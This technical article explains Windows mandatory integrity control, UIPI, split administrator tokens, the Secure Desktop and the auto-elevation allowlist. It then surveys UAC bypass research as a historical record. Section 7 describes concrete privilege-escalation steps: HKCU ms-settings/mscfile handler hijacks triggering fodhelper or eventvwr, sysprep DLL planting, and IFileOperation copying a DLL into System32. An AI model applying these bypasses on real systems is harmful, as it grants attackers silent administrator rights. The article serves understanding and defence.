The gating conditions for uiAccess=true are tight, by design. Microsoft Learn enumerates three [@uia-security]. The manifest must assert uiAccess="true" in the requestedExecutionLevel element. The binary must carry a valid Authenticode signature. The binary must reside in a directory writable only by administrators, which in practice means %SystemRoot%\System32, %ProgramFiles%, or a similarly admin-only path. The three conditions together are intended to bound uiAccess to vetted, signed, install-time-protected binaries.

We will return to the uiAccess carve-out in §9, because Forshaw's February 2026 Project Zero retrospective documents that five of nine pre-GA Administrator Protection bypasses operated entirely through this surface [@forshaw-adminprot-feb26]. The Vista-era exemption inherited unchanged into 2026 is, nearly twenty years later, the single largest residual cross-IL attack class in the Windows integrity stack.

What UIPI killed, precisely

UIPI killed the cross-IL variant of the Paget-2002 shatter-attack class (later extended by Brett Moore's 2004 work). Same-IL shatter attacks (two Medium-IL processes on the user's Default desktop, both belonging to the same user, both running with the user's authority) are not blocked by UIPI, because UIPI is an IL-based filter. Two same-IL processes can still send each other arbitrary window messages, and this is exactly why every modern browser sandbox layers AppContainer and a restricted-token sandbox on top of MIC [@appcontainer-isolation]: the integrity primitives are correct, but they are integrity primitives, not identity primitives, and same-IL same-desktop processes need a different isolation mechanism.

Together, MIC and UIPI provide an integrity bound on access (objects) and on user-interface manipulation (windows). Both are mandatory, default-on, and constant-overhead. They are the load-bearing primitive pair of the entire integrity-level stack. But how does the OS decide which processes get which IL? When you log in as Administrator and open a PowerShell, why is that PowerShell Medium and not High?

5. The Split-Token Breakthrough

The integrity-level pair (MIC plus UIPI) is the access-control primitive. The split-token model is the policy decision that wires those primitives into the administrator's everyday experience. Without the split-token policy, an administrator's interactive shell would hold a High-IL token at logon and UAC would never need to exist. With it, every administrator on Windows 11 today has two tokens. One is in use. The other is dormant. The yellow dialog is the negotiation that toggles between them.

The Vista policy in which an Administrators-group user logging on receives a Medium-IL filtered token plus a dormant High-IL linked token. The filtered token becomes the primary token of the interactive shell; the linked token is used only after consent or auto-elevation, and only when the Application Information service brokers a process creation with it.

What the LSA does at logon

When EnableLUA=1 in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (the default since Vista), and an Administrators-group user logs on, the Local Security Authority subsystem (LSASS) constructs three things during logon processing [@uac-how-it-works].

The first is the full token: an access token that contains all of the user's administrator group SIDs (enabled, not deny-only), all of the privileges the user is authorised to hold, and an integrity level of High. This is the token that, on XP, would have been the user's primary token from logon onward.

The second is the filtered token: a copy of the full token with all administrator-equivalent group SIDs marked SE_GROUP_USE_FOR_DENY_ONLY, all privileges except a small user-mode subset removed, and the integrity level reduced to Medium. The administrator group SIDs are not removed; they are marked deny-only so they still match deny ACEs but do not satisfy allow ACEs. The privileges are not zeroed; the powerful ones (SeDebug, SeTakeOwnership, SeLoadDriver, SeAssignPrimaryToken, and others) are dropped from the filtered token entirely.

The third is the linked relationship: the LSA stamps each token with a reference to the other via the TokenLinkedToken information class, so that a holder of the filtered token can, with the right privileges, retrieve a handle to the dormant full token by calling NtQueryInformationToken(filteredToken, TokenLinkedToken, &linkedToken, ...) [@uac-how-it-works].

The filtered token then becomes the primary access token of the user's interactive shell (explorer.exe). Every process the user launches by clicking, by Win+R, by typing in a console, inherits the filtered token as its primary token. The dormant full token sits in the LSA, addressable through TokenLinkedToken. The verbatim Microsoft Learn statement is exact: "When an administrator logs on, two separate access tokens are created for the user: a standard user access token and an administrator access token" [@uac-how-it-works].

flowchart TD A["User authenticates
as a member of Administrators"] --> B["LSA logon processing
(LsaLogonUser)"] B --> C["Full token
(admin SIDs enabled, all privileges, IL = High)"] B --> D["Filtered token
(admin SIDs deny-only, privileges stripped, IL = Medium)"] C -.->|"linked via TokenLinkedToken"| D D --> E["Primary token of explorer.exe
and all interactive child processes"] C --> F["Dormant in LSA, used only by Appinfo after consent or auto-elevation"]

The TokenElevationType API surface

Three values of the TOKEN_ELEVATION_TYPE enumeration describe what state the current process is in [@token-elevation-type].

TokenElevationTypeDefault (1) -- no split-token policy is in effect for this token. This is the legacy case (EnableLUA=0) or the case where the user is not a member of any administrators-equivalent group at all. The single token is the only token, and no linked token exists. On a default consumer or enterprise Windows 11 install with an admin account, this value is rare.
TokenElevationTypeFull (2) -- the current process is running with the unfiltered admin token. Admin Approval Mode is in force; this process either was launched via elevation (and holds the linked full token) or was created in a context where the filtered/full distinction is collapsed (some service contexts).
TokenElevationTypeLimited (3) -- the current process is running with the filtered token, Admin Approval Mode is in force, and a dormant full token exists. This is the typical state of an interactive admin shell on Windows 11.

TokenElevationTypeDefault (value 1) is the legacy or domain-controller case in which EnableLUA=0 and the user has no filtered token at all. On a default consumer Windows install, administrators are always TokenElevationTypeLimited or TokenElevationTypeFull, never Default. The Default case is what reverting EnableLUA to 0 produces, and it is the configuration the FAQ in §11 warns against.

What the consent prompt actually does

The behaviour of the consent prompt now resolves to a single operation, and the operation is not "elevate." When the user invokes "Run as administrator" on a binary, the shell calls ShellExecuteEx with the "runas" verb [@shellexecuteexa]. The Application Information service (the topic of §6.2) receives the request via RPC. Appinfo, running as LocalSystem, retrieves the linked full token of the calling user via TokenLinkedToken. Appinfo shows the consent prompt on the Secure Desktop (§6.1). If the user clicks "Yes," Appinfo creates a new process using the full token as the new process's primary token, by calling CreateProcessAsUser with the privileges Appinfo holds because it is LocalSystem [@russinovich-tnm-2007].

The bits that move are the kernel-level handle for the new process and the assignment of the linked token as that process's primary token. The bits the prompt itself moves are zero. The prompt is the consent surface; the token swap is the primitive.

Key idea: The consent prompt does not create authority. It uses authority that was already constructed at logon and held dormant in the linked token. The same primitive can move bits without the prompt -- that is exactly what auto-elevation does.

sequenceDiagram participant U as User participant E as explorer.exe (Medium IL) participant A as Appinfo (LocalSystem) participant C as consent.exe (Secure Desktop) participant P as New process (High IL) U->>E: Right-click, Run as administrator E->>A: RPC: request elevation of target.exe A->>A: Look up TokenLinkedToken of caller's filtered token A->>C: Show consent prompt U->>C: Click Yes C-->>A: Consent granted A->>P: CreateProcessAsUser(linked full token, target.exe) Note over P: New process runs at High IL, full admin SIDs enabled, full privileges Split-token administrator in UAC just means MS get to annoy you with prompts unnecessarily but serves very little, if not zero security benefit. -- James Forshaw, *Reading Your Way Around UAC (Part 1)*, Tyranid's Lair, May 2017

Forshaw's 2017 critique is the load-bearing observation that frames the rest of the article [@forshaw-reading-uac]. Even with the elegant split-token policy in place, there is a structural problem the design did not solve. The filtered token and the linked token share the same user SID. They write to the same %USERPROFILE%. They consult the same HKCU registry hive. They live in the same logon-session LUID. From an integrity-isolation point of view, the two tokens are bounded against each other; from an identity-isolation point of view, they are the same user.

That shared-identity property is what made the bypass-research industry possible, and what Administrator Protection finally attacks in 2024 (§9). We will return to it. First, let us tour the rest of the stack the consent prompt sits on. If Appinfo is the SYSTEM-trusted broker that does the token swap, where does it live? And what stops malware from spoofing the consent prompt itself?

6. The Full UAC Stack on a Modern Windows Box

The reader now knows the four load-bearing primitives. This section walks every supporting piece that surrounds them on a 2026 Windows install, in the order needed to follow an elevation event end-to-end. There are four pieces: the Secure Desktop the prompt renders on, the Appinfo service that brokers the token swap, the two distinct activation surfaces that trigger an elevation, and the auto-elevation allowlist that shaped fifteen years of bypass research.

6.1 The Secure Desktop, not Session 0

A separate desktop object at the Object-Manager path `\Sessions\\Windows\WindowStations\WinSta0\Winlogon`, within the user's interactive session, on which `consent.exe` runs the UAC prompt. Isolated from the user's `Default` desktop by Object-Manager DACL and the `SwitchDesktop` API.

When you click "Run as administrator" and the screen dims and the prompt appears, the screen dims because you have just been switched to a different desktop. Not a different session, not Session 0, not a different window station. A different desktop within the same window station, accessed through the SwitchDesktop API [@russinovich-tnm-2007].

The Object-Manager path is exact. Inside the user's interactive session (Session 1 if the user is the first interactive logon, higher numbers for subsequent users), there is a window station named WinSta0. Inside WinSta0 there are several desktop objects: Default (where the user's normal interactive processes paint), Winlogon (where consent.exe runs the prompt), and Disconnect and Screen-saver for related uses. The full path of the Secure Desktop is \Sessions\<n>\Windows\WindowStations\WinSta0\Winlogon.

The Winlogon desktop is protected by an Object-Manager DACL that the user's normal interactive processes (running on Default) cannot open for DESKTOP_CREATEWINDOW or DESKTOP_HOOKCONTROL. A Medium-IL malware process on Default cannot draw into the Winlogon desktop, cannot enumerate its windows, and cannot send messages to them. The OS performs the desktop switch in win32k.sys and renders consent.exe's window on the new desktop with a snapshot of the previous desktop as a dimmed background, so the user has visual continuity but consent.exe is the only process accepting input [@russinovich-tnm-2007].

Note: The Secure Desktop is not in Session 0. Session 0 Isolation is a different Vista feature that moved all Windows services off the interactive desktop into a non-interactive session (Session 0), separately from the per-user interactive sessions (Sessions 1, 2, ...). The Secure Desktop is within the user's interactive session: a different desktop object inside the same window station, not a different session. The two features ship together in Vista and are constantly confused, because they are both 2006-era hardening primitives. They are architecturally independent: Session 0 Isolation prevents services from drawing on the user's desktop, and the Secure Desktop prevents the user's processes from drawing on the prompt's desktop. Conflating them mis-describes how either one works. The corpus's Object Manager Namespace article (#46) covers Session 0 Isolation directly; this article treats only the Secure Desktop.

A separate Vista feature, architecturally independent of the Secure Desktop, that moved all Windows services off the interactive desktop and into Session 0. The two features ship together in Vista and are constantly confused, but they live at different layers of the Object Manager hierarchy. flowchart TD A["Session 1
(interactive logon for user 'admin')"] --> B["WinSta0
interactive window station"] A --> C["Service-0x0-3e7$
non-interactive WinSta (services)"] B --> D["Default desktop
explorer.exe, browsers, console windows
(Medium IL processes)"] B --> E["Winlogon desktop
consent.exe renders here
(Secure Desktop)"] B --> F["Disconnect / Screen-saver
desktops"] D -. "blocked by Object-Manager DACL
and SwitchDesktop" .-> E

The Secure Desktop addresses UI spoofing and input injection against the prompt itself. It does not address whether elevation can happen without a Secure Desktop prompt; that is the territory of the auto-elevation allowlist (§6.4) and of the bypass-research class (§7).

6.2 The Application Information service (Appinfo)

The SYSTEM-trusted Windows service (`appinfo.dll`, hosted in `svchost.exe`, runs under `LocalSystem`) that mediates the token swap between filtered and linked tokens at elevation time. Required service: "Run as administrator" fails without it. The modern process-creation entry point is `RAiLaunchAdminProcess`.

Every UAC elevation on Windows goes through one service: Appinfo (display name "Application Information"). Its image is C:\Windows\System32\appinfo.dll, loaded into a shared svchost.exe host process, running as LocalSystem [@russinovich-tnm-2007].

The job is single-purpose: be the SYSTEM-trusted broker that performs the token swap. A Medium-IL caller cannot, by definition, create a process holding a token the caller does not possess. Creating a process under a token with privileges the caller lacks requires two privileges Medium-IL filtered admin tokens do not hold: SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege. LocalSystem has both [@russinovich-tnm-2007]. The broker therefore has to run as LocalSystem, and that is what Appinfo is for.

The modern entry point on Appinfo's RPC interface is RAiLaunchAdminProcess, documented verbatim in Forshaw's February 2026 Project Zero post on Administrator Protection [@forshaw-adminprot-feb26]. The Medium-IL caller invokes ShellExecuteEx with "runas"; the shell marshalls the request across to Appinfo; Appinfo retrieves the caller's TokenLinkedToken; if a prompt is needed, Appinfo shows consent.exe on the Secure Desktop; if the user clicks "Yes," Appinfo calls RAiLaunchAdminProcess to create the new process under the linked full token.

Disable Appinfo and "Run as administrator" returns an error. It is the single point of trust in the elevation pipeline, which is exactly why the bypass-research industry pays attention to it: anything that can trick Appinfo into auto-elevating an attacker-influenced binary, without the consent prompt, becomes a fileless UAC bypass (§7.1).

6.3 Two activation surfaces

Note: When you say "elevate a thing," the operating system understands two distinct primitives, not one. ShellExecuteEx "runas" is whole-process elevation: the OS launches a new process and runs the entire process at High IL. The COM Elevation Moniker is per-object elevation: the OS spins up an isolated dllhost.exe that exposes exactly one COM CLSID's methods at High IL while the caller stays at Medium. The bypass-research literature attacks these two surfaces in very different ways. Conflating them mis-describes both the attack surface and the fix surface.

The first activation surface is ShellExecuteEx with the "runas" verb. The OS launches consent.exe, asks the user, and if approved, Appinfo creates a brand-new process under the caller's linked full token. The new process is High-IL for its entire lifetime, with the entire administrator privilege set and all the admin group SIDs enabled. The Windows Explorer "Run as administrator" context menu uses this verb. So does the runas /trustlevel: command. So does any program that calls ShellExecuteEx and sets the lpVerb member of SHELLEXECUTEINFO to the string "runas" [@shellexecuteexa].

A COM activation surface (`Elevation:Administrator!new:{CLSID}`) that asks the OS to instantiate a single COM out-of-process server in a new elevated `dllhost.exe`, exposing only that one CLSID's methods at High IL. Per-object elevation, distinct from `ShellExecuteEx "runas"` whole-process elevation.

The second activation surface is the COM Elevation Moniker. A Medium-IL caller invokes CoGetObject (or CoCreateInstance via a moniker) with the display name "Elevation:Administrator!new:{CLSID}" (or "Elevation:Highest!new:{CLSID}"). This asks the OS to instantiate a single COM out-of-process server in a new elevated dllhost.exe host process, exposing only that one CLSID's methods at High IL. The caller stays at Medium. Only the COM object's host process is elevated, and only for the lifetime of the object [@com-elevation-moniker].

The semantics are deliberately narrow. The COM Elevation Moniker requires the target CLSID to opt in via two registry values under HKCR\CLSID\{CLSID}: Elevation\Enabled = 1 and an LocalizedString value that names the elevation prompt's display string. Not every COM class is moniker-eligible; the registry enables elevation per CLSID.

Property	`ShellExecuteEx "runas"`	COM Elevation Moniker
Granularity	Whole process	One COM object
Lifetime	Entire process lifetime	Object lifetime only
Caller IL after	Caller stays Medium; new process High	Caller stays Medium
New process	Target executable	`dllhost.exe` host
Authority surface	All admin SIDs and privileges, broad	Methods of one CLSID, narrow
Typical use	"Run as administrator" context menu, MSI installers	Programmatic file copy, Wmi management, registry edits
Primary canonical bypass class	DLL-search-order against the new process	Auto-elevated COM behaviour abuse

The distinction matters because most of the canonical UAC bypasses do not touch ShellExecuteEx "runas" at all. Leo Davidson's December 2009 essay attacked the COM Elevation Moniker by invoking the IFileOperation COM class (auto-elevation-eligible, registered under the right CLSID) from a Medium-IL caller, and using its CopyItem method to overwrite a system file at High IL [@davidson-2009][@ifileoperation]. The ICMLuaUtil and IColorDataProxy interfaces follow the same shape: a Medium-IL caller instantiates an auto-elevatable COM class via the moniker, and then calls a method on the High-IL object that performs an attacker-chosen action [@uacme].

Both surfaces share the same backend: Appinfo brokers the token swap, and RAiLaunchAdminProcess (or its COM equivalent) creates the new process. The difference is whether the elevated child is a whole new process (broad authority for a long time) or a COM object's host (narrow authority for a single activation). The bypass-research literature exploits the second class far more than the first, because the second class exposes a narrower, more abusable behavioural surface: the CLSID's methods.

6.4 The auto-elevation allowlist

Vista's prompt fatigue was a usability disaster. Beta reviewers described users clicking through three or four prompts per common task. Windows 7, shipped in October 2009, tried to cut the noise by quietly elevating a curated set of Microsoft-signed binaries with no prompt at all. That single decision shaped the next fifteen years of UAC bypass research, because every "bypass" you have ever read about lives inside the gap between which binary gets elevated and what the binary does after elevation.

The set of Microsoft-signed binaries in trusted system directories on Appinfo's internal allowlist that elevate without a consent prompt. Four gating conditions: `autoElevate=true` manifest element, Microsoft Authenticode signature, trusted directory path, and an internal Appinfo allowlist entry enforced inside `appinfo.dll`.

The manifest element is a single string. Inside the application's side-by-side manifest, under the <trustInfo> / <security> / <requestedPrivileges> element, the binary asserts <autoElevate>true</autoElevate> [@app-manifests]. That assertion was discovered and publicly documented by independent UK developer Leo Davidson in December 2009 [@davidson-2009].

The autoElevate=true manifest assertion is necessary but not sufficient. Appinfo enforces three additional gating conditions before honouring an auto-elevation request [@davidson-2009].

The binary must carry a valid Authenticode signature chained to a Microsoft root certificate.
The binary's path must reside under a trusted system directory, in practice %SystemRoot%\System32 or %SystemRoot%\SysWOW64 (or the localized variants for non-English locales).
The binary's name must appear on an internal allowlist enforced in code in appinfo.dll, not in any user-visible policy file.

The fourth gate (the internal allowlist) is the one that surprises practitioners. A binary can be Microsoft-signed, located in System32, and carry autoElevate=true in its manifest, and Appinfo can still refuse to auto-elevate it, because the binary's name is not on the hard-coded allowlist inside appinfo.dll. There is no public Microsoft-published file enumerating the allowlist; the only way to enumerate it operationally is to scan the manifests of every binary in System32 and cross-check which ones actually auto-elevate.

The community-standard way to enumerate the manifest-asserting subset of the allowlist is to run Sysinternals `sigcheck -m C:\Windows\System32\*.exe` and pipe the output to `findstr /i autoelevate`. That gives you every binary in `System32` whose embedded manifest asserts `autoElevate=true`. On a Windows 11 25H2 install, the list runs to thirty to forty binaries: `mmc.exe`, `eventvwr.exe`, `fodhelper.exe`, `ComputerDefaults.exe`, `sdclt.exe`, `slui.exe`, and others.

The list of names in the manifest is not the same as the set Appinfo actually auto-elevates. UACMe's research README enumerates the operational subset: which manifest-asserting binaries Appinfo actually honours, by Windows build, with the technique class and the catalogued bypass method [@uacme]. The canonical observation is that of the manifest-asserting list, only the operationally-allowlisted subset is exploitable, and the operational subset changes silently across feature updates without any security bulletin because none of the resulting bypasses are classified as security vulnerabilities.

{` // Pseudocode of Appinfo's auto-elevation decision (Win7+). // All four gates must pass for auto-elevation without a consent prompt.

function shouldAutoElevate(binaryPath) { // Gate 1: the application manifest must assert autoElevate=true. const manifest = readEmbeddedManifest(binaryPath); if (manifest?.requestedPrivileges?.autoElevate !== true) return false;

// Gate 2: the binary must carry a valid Microsoft Authenticode signature. const sig = verifyAuthenticodeSignature(binaryPath); if (sig.status !== 'valid' || sig.rootCA !== 'Microsoft') return false;

// Gate 3: the binary must reside under a trusted system directory. const trustedDirs = ['C:\\Windows\\System32\\', 'C:\\Windows\\SysWOW64\\']; if (!trustedDirs.some(d => binaryPath.toLowerCase().startsWith(d.toLowerCase()))) return false;

// Gate 4: the binary name must appear on Appinfo's internal allowlist. // This is the one enforced in code in appinfo.dll, not exposed as policy. if (!APPINFO_INTERNAL_ALLOWLIST.includes(baseName(binaryPath).toLowerCase())) return false;

return true; } `}

Four gating conditions. Three of them constrain which binary gets elevated. None of them constrain what the binary does after elevation. The fourth gap, the behavioural one, is the space the bypass-research industry has occupied for fifteen years. That is §7.

7. Twenty Years of Bypass Research as Empirical Test

In February 2007, eleven days after Vista's consumer launch, Mark Russinovich published a TechNet Blogs post titled PsExec, User Account Control and Security Boundaries. The post walked through a quirk of how PsExec's -l switch interacted with restricted tokens on Windows XP, used the walkthrough to introduce Vista's integrity-level model, and then dropped a single sentence the entire later debate would rest on [@russinovich-blog-2007].

Neither UAC elevations nor Protected Mode IE define new Windows security boundaries... potential avenues of attack, regardless of ease or scope, are not security bugs. -- Mark Russinovich, *PsExec, User Account Control and Security Boundaries*, TechNet Blogs, February 12, 2007

That sentence, in the public record from week one, is the architectural reason every "UAC bypass" published from 2009 onward was classified by Microsoft as a non-vulnerability. The bypass-research literature is the empirical proof of the disclaimer, not a counterargument to it. Three durable bypass classes carry the empirical weight.

7.1 The `ms-settings` / `DelegateExecute` registry-hijack class

The first durable class is the registry-hijack bypass of auto-elevated binaries. Mechanism: an auto-elevated binary (eventvwr.exe, fodhelper.exe, ComputerDefaults.exe, certain sdclt.exe variants) executes a handler for a custom file extension or URL protocol on launch. The relevant handler mapping is in HKCR, but Windows resolves HKCR by first consulting HKCU\Software\Classes and only falling back to HKLM\Software\Classes if no per-user mapping exists. A Medium-IL user can write to HKCU without elevation. So the user writes a HKCU\Software\Classes\<scheme>\shell\open\command key whose default value is an arbitrary command line and whose DelegateExecute value is the empty string. Then the user launches the auto-elevated binary. The binary loads, Appinfo elevates it to High IL, the binary resolves its registered handler, walks HKCU\Software\Classes first, finds the attacker-controlled command line, and executes it. The attacker's command runs at High IL [@enigma-eventvwr][@mitre-t1548002].

The first public canonical demonstration was Matt Nelson's August 15, 2016 post Fileless UAC Bypass Using eventvwr.exe and Registry Hijacking, published on his blog under the handle enigma0x3. Nelson hijacked the mscfile association by writing HKCU\Software\Classes\mscfile\shell\open\command with cmd.exe as the default value, then launched eventvwr.exe. The Event Viewer auto-elevates because of its manifest, resolves the mscfile association to load eventvwr.msc, walks the HKCU mapping first, finds cmd.exe instead of mmc.exe, and launches an attacker-controlled cmd.exe at High IL [@enigma-eventvwr]. The technique required no file on disk except the registry value itself; this is what fileless means in this context.

Nelson productised the class through 2017. The March 14, 2017 Bypassing UAC Using App Paths post generalised to HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe, exploited by sdclt.exe [@enigma-apppaths]. The March 17, 2017 'Fileless' UAC Bypass Using sdclt.exe post showed a fileless variant of the same attack using the IsolatedCommand REG_SZ value on HKCU:\Software\Classes\Folder\shell\open\command, with sdclt.exe /KickOffElev as the trigger [@enigma-sdclt]. The same post referenced WikiLeaks's March 2017 Vault7 disclosures, in which the CIA's "Vault7" cache contained operationalised versions of the technique, confirming nation-state adoption of the bypass class [@enigma-sdclt].

The fodhelper variant was published on May 12, 2017 by winscripting.blog, in the post First entry: Welcome and fileless UAC bypass (winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/); it abuses HKCU\Software\Classes\ms-settings\shell\open\command. It is a separate researcher's contribution, not part of Nelson's series, and is anchored by UACMe Method 33 (credited to winscripting.blog) and MITRE ATT&CK T1548.002 [@uacme][@mitre-t1548002].

sequenceDiagram participant U as User (Medium IL) participant R as HKCU registry participant F as fodhelper.exe (auto-elevated) participant A as Appinfo (LocalSystem) participant C as Attacker payload (High IL) U->>R: Write HKCU Software Classes ms-settings shell open command with attacker cmd U->>F: ShellExecute("fodhelper.exe") F->>A: Request elevation (autoElevate gate passes) A->>F: New process at High IL, no consent prompt F->>R: Resolve ms-settings handler via HKCU first R-->>F: Returns attacker command F->>C: Spawn attacker payload at High IL

Microsoft's response to the eventvwr bypass was to ship a fix in the Windows 10 Creators Update (1703) that made eventvwr.exe not consult the registered association the technique exploited. The fix was technique-specific, not class-specific: the ms-settings (fodhelper), App Paths (sdclt), and IsolatedCommand (sdclt) variants remained exploitable through subsequent Windows 10 builds and into Windows 11 [@uacme][@mitre-t1548002]. None of these were patched as security vulnerabilities, because, per Russinovich 2007, UAC is not a security boundary [@russinovich-blog-2007].

7.2 The DLL-search-order class

The second durable class is the DLL-search-order attack against auto-elevated binaries. Mechanism: an auto-elevated binary calls LoadLibrary on a DLL name resolved via the standard Windows search order: the application directory, the system directory, the current directory, the PATH environment variable, and so on. If any path on that search order earlier than the legitimate one is writable by the Medium-IL caller, the caller can plant an attacker DLL at that path. When the auto-elevated binary loads the legitimate name, the search order returns the attacker's DLL first, and the DLL is loaded at the binary's elevated IL [@davidson-2009].

The foundational canonical example is the December 2009 Leo Davidson essay Windows 7 UAC whitelist: Code injection issue (and more). Davidson demonstrated that sysprep.exe (Microsoft-signed, in System32, auto-elevation-allowlisted) loads cryptbase.dll from its working directory before the system directory. By copying sysprep.exe and a malicious cryptbase.dll into a writable directory and launching sysprep.exe from there, an attacker could load the malicious DLL into a High-IL process [@davidson-2009]. The same essay introduced the IFileOperation COM-object technique that founded the second durable class (§7.3), making the December 2009 Davidson essay the single most-cited primary in the entire UAC bypass literature.

Coverage in the trade press confirmed the class's significance immediately. In February 2009, The Register reported on a related Long Zheng / Rafael Rivera disclosure that demonstrated piggybacking on auto-elevation via rundll32.exe [@register-2009], establishing that the auto-elevation surface had been understood as exploitable from the moment Windows 7 shipped.

Microsoft's mitigations against the DLL-search-order class have been incremental. SafeDllSearchMode was made the default in Windows XP SP2 and reshuffled the search order so the application directory came before the current directory. The LOAD_LIBRARY_SEARCH_* flags (introduced in Windows 8 and backported to Vista and 7 via update KB2533623) let applications opt into stricter search behaviour. Side-by-side manifest pinning and the KnownDLLs mechanism shrink the surface further. All of these are application-author opt-ins; an auto-elevated binary that does not use them remains exploitable, and UACMe's catalogue of 81 methods includes numerous DLL-search-order entries across Windows versions [@uacme].

7.3 The auto-elevated COM-object behaviour-abuse class

The third durable class abuses the behaviour of auto-elevation-eligible COM classes. Mechanism: a COM class registered as auto-elevation-eligible (the IFileOperation / ICMLuaUtil / IColorDataProxy family historically, then the explicit COMAutoApprovalList registry surface introduced in Windows 10 RS1 / build 14393 in August 2016) can be instantiated High-IL by a Medium-IL caller via the COM Elevation Moniker. Once instantiated, the High-IL object exposes methods (file copy, registry write, executable launch) that perform actions at High IL using whatever parameters the caller passes [@davidson-2009][@ifileoperation].

Davidson's IFileOperation proof of concept from December 2009 is the canonical example. A Medium-IL caller instantiates IFileOperation via the COM Elevation Moniker. The resulting dllhost.exe runs at High IL and exposes IFileOperation::CopyItem and related methods. The caller invokes CopyItem("evil.dll", "C:\\Windows\\System32\\"). The High-IL dllhost.exe performs the copy, because the High-IL token has write access to %SystemRoot%\System32. The caller has now planted a DLL in System32 without ever holding a High-IL token itself [@davidson-2009][@ifileoperation].

The COMAutoApprovalList era began in August 2016 with the Windows 10 Anniversary Update (RS1, build 14393). Microsoft added a dedicated registry surface at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList enumerating which CLSIDs consent.exe would auto-elevate without a prompt. The change was unannounced: there is no Microsoft-published security bulletin naming the introduction. The community anchor is UACMe Method 49, whose fix-note carries the verbatim "Side effect of consent.exe COMAutoApprovalList introduction" against the TpmInit.exe ICreateNewLink technique, dated to RS1 / build 14393 [@uacme]. Method 27 captures the subsequent narrowing in RS3 (Insider build 16199), when Microsoft removed the UninstallStringLauncher interface from the list.

Class	Mechanism	Canonical research	Microsoft response
Registry-hijack (DelegateExecute)	Auto-elevated binary resolves user-writable HKCU handler	Nelson, eventvwr Aug 2016; sdclt and fodhelper 2017	Patched individual binaries; class never classified as security vulnerability
DLL-search-order	Auto-elevated binary loads attacker DLL via standard search path	Davidson, December 2009 (sysprep + cryptbase)	`SafeDllSearchMode`, `LOAD_LIBRARY_SEARCH_*`, KnownDLLs; shrunk but not eliminated
Auto-elevated COM behaviour	Medium-IL caller invokes High-IL methods via moniker	Davidson, December 2009 (IFileOperation); COMAutoApprovalList RS1 Aug 2016	Curated allowlist; entries added or removed in feature updates without CVEs

7.4 The doctrine and the aha

The two distinct 2007 sources need precise attribution, because the citation chain is the load-bearing artifact of the entire UAC-as-not-a-boundary argument.

Note: The verbatim "Neither UAC elevations nor Protected Mode IE define new Windows security boundaries" sentence lives in the PsExec, User Account Control and Security Boundaries TechNet Blogs post by Mark Russinovich, dated February 12, 2007 [@russinovich-blog-2007]. The architectural reference that most practitioners cite, Security: Inside Windows Vista User Account Control, was published in the June 2007 issue of TechNet Magazine and is the canonical reference for the integrity model, file/registry virtualisation, and the elevation pipeline [@russinovich-tnm-2007]. The architectural article does not contain the "not a security boundary" sentence; the February blog post does. Conflating the two is a citation error and gives the wrong impression of when Microsoft committed to the boundary classification.

The Microsoft Security Response Center's published servicing criteria define a security boundary as one that "provides a logical separation between the code and data of security domains with different levels of trust" [@msrc-criteria]. The MSRC servicing-criteria page enumerates which Windows boundaries qualify under that definition. Through the Vista-through-Windows-10 era (2007-2024), UAC was explicitly classified as a security feature, not a boundary, in the enumeration table on that page. The enumeration is rendered client-side (in JavaScript) and not visible through static fetches; the canonical confirmation for the classification is the Russinovich February 2007 sentence above, repeated and re-affirmed in Microsoft public statements throughout the period [@russinovich-blog-2007].

Forshaw's January 2026 Project Zero post on Administrator Protection reads the doctrine clearly in retrospect: "due to the way it was designed, it was quickly apparent it didn't represent a hard security boundary, and Microsoft downgraded it to a security feature" [@forshaw-adminprot-jan26]. Forshaw's "downgraded" wording is useful retrospective shorthand, but Russinovich's February 2007 post shows the public classification from the start: UAC elevation was a security feature, not a Windows security boundary, from the moment it shipped. The reclassification in November 2024 was a re-promotion with new architecture, not a fix to the old architecture.

Note: The twenty-year UAC bypass-research record is empirical confirmation, not counterargument, of the architect's 2007 disclaimer. Microsoft did not fix the bypasses as security vulnerabilities because Russinovich had already said in writing that there was nothing to "fix": the consent prompt was a convenience, not a boundary. The bypass record is the proof that the disclaimer was honest from week one.

For the Windows administrator who has watched the bypass-research industry produce a new fileless bypass every six to twelve months, the reframing is the load-bearing aha of the entire article. The bypasses are not bugs Microsoft has failed to fix. They are the empirical map of the access-control versus information-flow gap that any access-control primitive runs into in a backward-compatible OS. The empirical record from 2009 forward (Davidson, Nelson, hfiref0x, Forshaw) is the cumulative confirmation that the disclaimer was honest.

If MIC, UIPI, and the split-token model are sound primitives, and the bypasses do not violate Microsoft's own classification of them, what are the actual theoretical limits of integrity-level systems? What can MIC and UIPI never do, by design?

8. Theoretical Limits: What MIC and UIPI Cannot Do, by Design

The 2007 disclaimer was not just an admission of weakness. It was an accurate statement of the theoretical limits of any access-control primitive in a backward-compatible operating system. The bypass-research industry of 2009 to 2026 has empirically traced out those limits one technique at a time, and a careful reading of the theory tells us why the trace looks the way it does.

Biba 1977 and the three rules

The integrity model MIC implements comes from Kenneth J. Biba's 1977 MITRE technical report MTR-3153 [@biba-wiki]. Biba's model is the integrity-side mirror of the better-known Bell-LaPadula confidentiality model [@blp-wiki]: where Bell-LaPadula's "no read up" prevents confidentiality leaks, Biba's "no write up" prevents integrity contamination. The Biba model defines three rules.

Simple Integrity Property (no read down): a subject at integrity level $I_s$ cannot read an object at integrity level $I_o < I_s$. A High-IL subject cannot read Low-IL data, because Low-IL data may have been written by an untrusted source and might contaminate the subject's state.
Star Integrity Property (no write up): a subject at integrity level $I_s$ cannot write an object at integrity level $I_o > I_s$. A Low-IL subject cannot write to a High-IL object, because the Low-IL subject's writes would degrade the High-IL object's integrity.
Invocation Property: a subject at integrity level $I_s$ cannot invoke (call, request services from) a subject at integrity level $I_o > I_s$. A Low-IL caller cannot ask a High-IL server to perform an action on the caller's behalf, because the High-IL server would then act on Low-IL inputs.

MIC implements the Star Integrity Property as the default NO_WRITE_UP policy. Every object that does not explicitly request a different policy is protected against lower-IL writes [@mic-doc][@mandatory-label-ace]. That is the one Biba rule MIC actually enforces.

